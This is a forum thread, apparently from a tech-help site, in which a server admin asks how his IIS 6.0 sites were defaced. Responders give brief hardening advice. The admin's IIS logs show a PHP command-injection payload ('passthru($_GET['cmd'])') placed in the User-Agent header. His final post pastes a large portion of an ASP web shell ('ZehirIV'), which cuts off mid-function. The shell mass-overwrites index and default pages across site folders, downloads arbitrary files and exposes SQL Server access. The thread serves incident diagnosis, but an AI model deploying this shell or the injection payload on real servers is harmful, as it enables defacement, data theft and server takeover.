[Okta Webinar] Learn how to a build a cloud-first strategyRegister Now

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1551
  • Last Modified:

windows server 2003 server hack issue


Recently our server  hacked by pakbugs,
I don't understand how hacker create and replace some home page (default.htm, index.htm, default.asp) without login the server  or ftp access

Kindly help me to secure my server.

The following thing server running on our server.

IIS 6.0
tomcat 5
merak mailserver
cold fusion 4.5



I have check the following logs but unable to understand the issue

Frist website hack logs
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-07 14:48:39
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-07 14:48:39 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 123.201.132.126 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;+Trident/4.0;

+GTB6.3;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+InfoPath.2) - delldigitalschoolathon.com 403 14 5 437
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 03:58:18
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-08 03:58:17 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 656
2010-01-08 03:58:17 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 281
2010-01-08 03:58:24 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 3531
2010-01-08 03:59:12 W3SVC1896362308 WTRS10138 198.65.102.164 GET /index.htm - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 578
2010-01-08 03:59:13 W3SVC1896362308 WTRS10138 198.65.102.164 GET /index.htm - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://delldigitalschoolathon.com/ delldigitalschoolathon.com 200 0 0 562
2010-01-08 04:00:03 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 406
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 04:24:28
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-08 04:24:28 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 121.242.204.200 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;

+GTB6.3;+InfoPath.2;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - www.delldigitalschoolathon.com 403 14 5 734
2010-01-08 04:24:58 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 121.242.204.200 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;

+GTB6.3;+InfoPath.2;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - www.delldigitalschoolathon.com 403 14 5 453
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 05:50:24
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-08 05:50:23 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 703
2010-01-08 05:50:26 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 2640
2010-01-08 05:50:26 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 453
2010-01-08 05:50:27 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 281
2010-01-08 05:50:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 3421
2010-01-08 05:50:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://delldigitalschoolathon.com/? delldigitalschoolathon.com 200 0 0 625
2010-01-08 05:50:56 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 578
2010-01-08 05:50:57 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;

+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://delldigitalschoolathon.com/ delldigitalschoolathon.com 200 0 0 562
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:12:49
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

sc-substatus sc-win32-status time-taken
2010-01-08 06:12:49 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 217.162.28.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;

+Trident/4.0) - delldigitalschoolathon.com 200 0 0 484
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:37:51
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status

+++++++++++
I also got hack website entry http://zone-h.org
http://zone-h.org/mirror/id/10095659



sc-substatus sc-win32-status time-taken
2010-01-08 06:37:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 210.212.184.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;

+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) http://zone-h.org/mirror/id/10095659 delldigitalschoolathon.com 200 0 0

875
2010-01-08 06:37:59 W3SVC1896362308 WTRS10138 198.65.102.164 GET /admin - 80 - 210.212.184.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET

+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) - delldigitalschoolathon.com 404 0 2 296

+++++++++++++++++++++++++++++++++++++++++
+++++++++++++
Second website logs
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-07 12:01:12
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-07 12:01:11 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 208.91.115.10 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.7.5)+Gecko/20041107+Firefox/1.0 - aqr.tyroo.com 403 14 5 468
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 05:52:45
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 05:52:44 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 403 14 5 734
2010-01-08 05:52:44 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 404 0 2 281
2010-01-08 05:52:47 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 404 0 2 281
2010-01-08 05:53:08 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 200 0 0 1078
2010-01-08 05:53:09 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://aqr.tyroo.com/ aqr.tyroo.com 200 0 0 640
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:12:49
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 06:12:48 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 217.162.28.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;+Trident/4.0) - aqr.tyroo.com 200 0 0 250
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 07:43:17
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 07:43:17 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 http://zone-h.org/mirror/id/10095660 aqr.tyroo.com 200 0 0 734
2010-01-08 07:43:17 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 - aqr.tyroo.com 404 0 2 203
2010-01-08 07:43:20 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 - aqr.tyroo.com 404 0 2 203
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 08:31:04
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 08:31:03 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 403 14 5 859
2010-01-08 08:31:04 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 404 0 2 343
2010-01-08 08:31:07 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 404 0 2 328
2010-01-08 08:31:09 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 403 14 5 531
++++++++++++++++

I also found an entry
http://zone-h.org/mirror/id/10095659


Regards,
Naresh
0
sitg
Asked:
sitg
  • 8
  • 4
  • 4
  • +1
1 Solution
 
senadCommented:
get a good firewall
make password policy of at least 15 characters (10 letters - 5 numbers)
example :
1A2BB3CCC4DDDD5X
etc...
0
 
sitgAuthor Commented:
We are using windows firewall and good password ( include space)
I need to reprot how theserver hack, kindly help me troubleshoot on this

0
 
senadCommented:
windows firewall is good for nothing.
Here read :
http://www.experts-exchange.com/Security/Misc/Q_21627533.html
0
 The Evil-ution of Network Security Threats

What are the hacks that forever changed the security industry? To answer that question, we created an exciting new eBook that takes you on a trip through hacking history. It explores the top hacks from the 80s to 2010s, why they mattered, and how the security industry responded.

 
govindarajan78Commented:
if you have a own server; restrict ftp access to certain IPs. that will help a lot.


define the default document in IIS, remove unnecessary default documents for a site

check the program code properly for sql injection possibility.

by the way,
create a new folder and configure the site when you out the site again.

have a good antivirus [like symantec end point protection] that detects unauthorized entries and injections.


hope this helps

0
 
govindarajan78Commented:
you can use filezilla for ftp; its free
0
 
sitgAuthor Commented:
Hi,
somebody try to use the attched code on our server


Regarss,
Naresh

<% 
mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
if Request("kuskapani")=1 then
	Response.End
end if
if Request("kuskapani")=2 then
	on error resume next
	path = Request("path")
	sFolder = Request("SubFolder")
	fName = Request("FileName")
	d1 = Request("dosya1")
	d2 = Request("dosya2")
	d3 = Request("dosya3")
	d4 = Request("dosya4")
	bg__ = Request.Form("selectColour")
	if bg__ = "0" then bg__ = "#ffffff"
	byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>powered by Z" & Session("n2") & "3 ;)</font>"
	
	sFolder = Replace(sFolder,"/","\")

	if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
	Set f = objFSO.GetFolder(Path)
	Set fc = f.SubFolders
	h__ = 0
	f__ = 0
	ss__ = now
	For Each f1 In fc
		hedef_ = replace(f1.path,"/","\")
		if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
		hedef__ = left(hedef_,len(hedef_)-1)
		folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
			if d1<>"" then d1 = true
			if d2<>"" then d2 = true
			if d3<>"" then d3 = true
			if d4<>"" then d4 = true
			on error goto 0:on error resume next
			if fName<>"" then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
				MyFile.write byMesaj
			end if
			if d1 then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
				MyFile.write byMesaj
			end if
			if d2 then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
				MyFile.write byMesaj
			end if
			if d3 then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
				MyFile.write byMesaj
			end if
			if d4 then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
				MyFile.write byMesaj
			end if

			if err<>0 then
				response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
				f__ = f__ + 1
			else
				response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
				h__ = h__ + 1
			end if
	Next
	ss___ = now
	response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
	response.End
end if

status = Request("status")
path   = Request("path")
dPath  = Request("dPath")
arama  = Request("txArama")
dkayit = Request("dkayit")
table  = Request("table")
del    = Request("del")
islem  = Request("islem")
strSQL = Request("strSQL")
cf	   = Request("cf")
pathfile = request("pathfile")
if path="" then path=request.servervariables("APPL_PHYSICAL_PATH") 
if status="" then status=2
popup = true
'////////////////////////////////
Function ReadBinaryFile(FileName)
  Const adTypeBinary = 1
  Dim BinaryStream
  Set BinaryStream = CreateObject("ADODB.Stream")
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.LoadFromFile FileName
  ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
    Response.Buffer=True
    Set Fil = objFSO.GetFile(pathfile)
	
    Response.contenttype="application/force-download"
	Response.AddHeader "Cache-control","private"
    Response.AddHeader "Content-Length", Fil.Size
    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name

	Response.BinaryWrite readBinaryFile(Fil.path)
    Set f = Nothing: Set Fil = Nothing
	response.End()
end if
'//////////////////////////////////
if status="-4" then popup=false
if status="13" then popup=false
if status="14" then popup=false
if status="15" then popup=false
if status="16" then popup=false
if status="17" then popup=false
if status="18" then popup=false
if status="19" then popup=false
if status="33" then popup=false
if status="40" then popup=false
if status="50" then popup=false
byMsg = request.QueryString("byMsg")
if byMsg<>"" then response.Write byMsg
response.Write "<title>[AhmetDeniz.Org] ZehirIV --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
if popup then
%>
<center>
<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
<script language=javascript>
	function sistemBilgisi(yol){
		NewWindow(yol,"",600,240,"no");
	}
	function SitelerTestte(yol){
		NewWindow(yol,"",530,420,"no");
	}
	function klasorIslemleri(yol){
		NewWindow(yol,"",400,280,"no");
	}
	function sqlServer(yol){
		NewWindow(yol,"",300,50,"no");
	}
	function poweredby(yol){
		NewWindow(yol,"",300,50,"no");
	}
	function sistemTest(yol){
		NewWindow(yol,"",400,300,"no");
	}
</script>
<%
end if
'####################################
Class clsUpload
	Private mbinData
	Private mlngChunkIndex
	Private mlngBytesReceived
	Private mstrDelimiter
	Private CR
	Private LF
	Private CRLF
	Private mobjFieldAry()
	Private mlngCount
	
	Private Sub RequestData
		Dim llngLength
		mlngBytesReceived = Request.TotalBytes
		mbinData = Request.BinaryRead(mlngBytesReceived)
	End Sub

	Private Sub ParseDelimiter()
		mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
	End Sub

	Private Sub ParseData()
		Dim llngStart
		Dim llngLength
		Dim llngEnd
		Dim lbinChunk
		llngStart = 1
		llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
		While Not llngStart = 0
			llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
			llngLength = llngEnd - llngStart
			lbinChunk = MidB(mbinData, llngStart, llngLength)
			Call ParseChunk(lbinChunk)
			llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
		Wend
	End Sub

	Private Sub ParseChunk(ByRef pbinChunk)
		Dim lstrName
		Dim lstrFileName
		Dim lstrContentType
		Dim lbinData
		Dim lstrDisposition
		Dim lstrValue
		lstrDisposition = ParseDisposition(pbinChunk)
		lstrName = ParseName(lstrDisposition)
		lstrFileName = ParseFileName(lstrDisposition)
		lstrContentType = ParseContentType(pbinChunk)
		If lstrContentType = "" Then
			lstrValue = CStrU(ParseBinaryData(pbinChunk))
		Else
			lbinData = ParseBinaryData(pbinChunk)
		End If
		Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
	End Sub

	Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
		Dim lobjField
		ReDim Preserve mobjFieldAry(mlngCount)
		Set lobjField = New clsField
		lobjField.Name = pstrName
		lobjField.FilePath = pstrFileName				
		lobjField.ContentType = pstrContentType
		If LenB(pbinData) = 0 Then
			lobjField.BinaryData = ChrB(0)
			lobjField.Value = pstrValue
			lobjField.Length = Len(pstrValue)
		Else
			lobjField.BinaryData = pbinData
			lobjField.Length = LenB(pbinData)
			lobjField.Value = ""
		End If
		Set mobjFieldAry(mlngCount) = lobjField
		mlngCount = mlngCount + 1
	End Sub

	Private Function ParseBinaryData(ByRef pbinChunk)
		Dim llngStart
		llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
		If llngStart = 0 Then Exit Function
		llngStart = llngStart + 4
		ParseBinaryData = MidB(pbinChunk, llngStart)
	End Function

	Private Function ParseContentType(ByRef pbinChunk)
		Dim llngStart
		Dim llngEnd
		Dim llngLength
		llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
		If llngStart = 0 Then Exit Function
		llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
		If llngEnd = 0 Then Exit Function
		llngStart = llngStart + 15
		If llngStart >= llngEnd Then Exit Function
		llngLength = llngEnd - llngStart
		ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
	End Function

	Private Function ParseDisposition(ByRef pbinChunk)
		Dim llngStart
		Dim llngEnd
		Dim llngLength
		llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
		If llngStart = 0 Then Exit Function
		llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
		If llngEnd = 0 Then Exit Function
		llngStart = llngStart + 22
		If llngStart >= llngEnd Then Exit Function
		llngLength = llngEnd - llngStart
		ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
	End Function

	Private Function ParseName(ByRef pstrDisposition)
		Dim llngStart
		Dim llngEnd
		Dim llngLength
		llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
		If llngStart = 0 Then Exit Function
		llngEnd = InStr(llngStart + 6, pstrDisposition, """")
		If llngEnd = 0 Then Exit Function
		llngStart = llngStart + 6
		If llngStart >= llngEnd Then Exit Function
		llngLength = llngEnd - llngStart
		ParseName = Mid(pstrDisposition, llngStart, llngLength)
	End Function
' ------------------------------------------------------------------------------
	Private Function ParseFileName(ByRef pstrDisposition)
		Dim llngStart
		Dim llngEnd
		Dim llngLength
		llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
		If llngStart = 0 Then Exit Function
		llngEnd = InStr(llngStart + 10, pstrDisposition, """")
		If llngEnd = 0 Then Exit Function
		llngStart = llngStart + 10
		If llngStart >= llngEnd Then Exit Function
		llngLength = llngEnd - llngStart
		ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
	End Function

	Public Property Get Count()
		Count = mlngCount
	End Property

	Public Default Property Get Fields(ByVal pstrName)
		Dim llngIndex
		If IsNumeric(pstrName) Then
			llngIndex = CLng(pstrName)
			If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
				Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
				Exit Property
			End If
			Set Fields = mobjFieldAry(pstrName)
		Else
			pstrName = LCase(pstrname)
			For llngIndex = 0 To mlngCount - 1
				If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
					Set Fields = mobjFieldAry(llngIndex)
					Exit Property
				End If
			Next
		End If
		Set Fields = New clsField
	End Property

	Private Sub Class_Terminate()
		Dim llngIndex
		For llngIndex = 0 To mlngCount - 1
			Set mobjFieldAry(llngIndex) = Nothing
			
		Next
		ReDim mobjFieldAry(-1)
	End Sub

	Private Sub Class_Initialize()
		ReDim mobjFieldAry(-1)
		CR = ChrB(Asc(vbCr))
		LF = ChrB(Asc(vbLf))
		CRLF = CR & LF
		mlngCount = 0
		Call RequestData
		Call ParseDelimiter()
		Call ParseData
	End Sub

	Private Function CStrU(ByRef pstrANSI)
		Dim llngLength
		Dim llngIndex
		llngLength = LenB(pstrANSI)
		For llngIndex = 1 To llngLength
			CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
		Next
	End Function

	Private Function CStrB(ByRef pstrUnicode)
		Dim llngLength
		Dim llngIndex
		llngLength = Len(pstrUnicode)
		For llngIndex = 1 To llngLength
			CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
		Next
	End Function
End Class
'####################################
Session("n1") = "byZ"
Class clsField
	Public Name
	Private mstrPath
	Public FileDir
	Public FileExt
	Public FileName
	Public ContentType
	Public Value
	Public BinaryData
	Public Length
	Private mstrText

	Public Property Get BLOB()
		BLOB = BinaryData
	End Property

	Public Function BinaryAsText()
		Dim lbinBytes
		Dim lobjRs
		If Length = 0 Then Exit Function
		If LenB(BinaryData) = 0 Then Exit Function
		
		If Not Len(mstrText) = 0 Then
			BinaryAsText = mstrText
			Exit Function
		End If
		lbinBytes = ASCII2Bytes(BinaryData)
   		mstrText = Bytes2Unicode(lbinBytes)
    	BinaryAsText = mstrText
	End Function

	Public Sub SaveAs(ByRef pstrFileName)
		Const adTypeBinary=1
		Const adSaveCreateOverWrite=2
		Dim lobjStream
		Dim lobjRs
		Dim lbinBytes
		If Length = 0 Then Exit Sub
		If LenB(BinaryData) = 0 Then Exit Sub
		Set lobjStream = Server.CreateObject("ADODB.Stream")
		lobjStream.Type = adTypeBinary
		Call lobjStream.Open()
		lbinBytes = ASCII2Bytes(BinaryData)
		Call lobjStream.Write(lbinBytes)
		
		On Error Resume Next
		
		Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
		
		'if err<>0 then response.Write "<br>"&err.Description
		
		Call lobjStream.Close()
		Set lobjStream = Nothing
	End Sub

	Public Property Let FilePath(ByRef pstrPath)
		mstrPath = pstrPath
		If Not InStrRev(pstrPath, ".") = 0 Then
			FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
			FileExt = UCase(FileExt)
		End If
		If Not InStrRev(pstrPath, "\") = 0 Then
			FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
		End If
		If Not InStrRev(pstrPath, "\") = 0 Then
			FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
		End If
	End Property

	Public Property Get FilePath()
		FilePath = mstrPath
	End Property

	private Function ASCII2Bytes(ByRef pbinBinaryData)
		Const adLongVarBinary=205
		Dim lobjRs
		Dim llngLength
		Dim lbinBuffer
		llngLength = LenB(pbinBinaryData)
		Set lobjRs = Server.CreateObject("ADODB.Recordset")
		Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
		Call lobjRs.Open()
		Call lobjRs.AddNew()
		Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
		Call lobjRs.Update()
		lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
		Call lobjRs.Close()
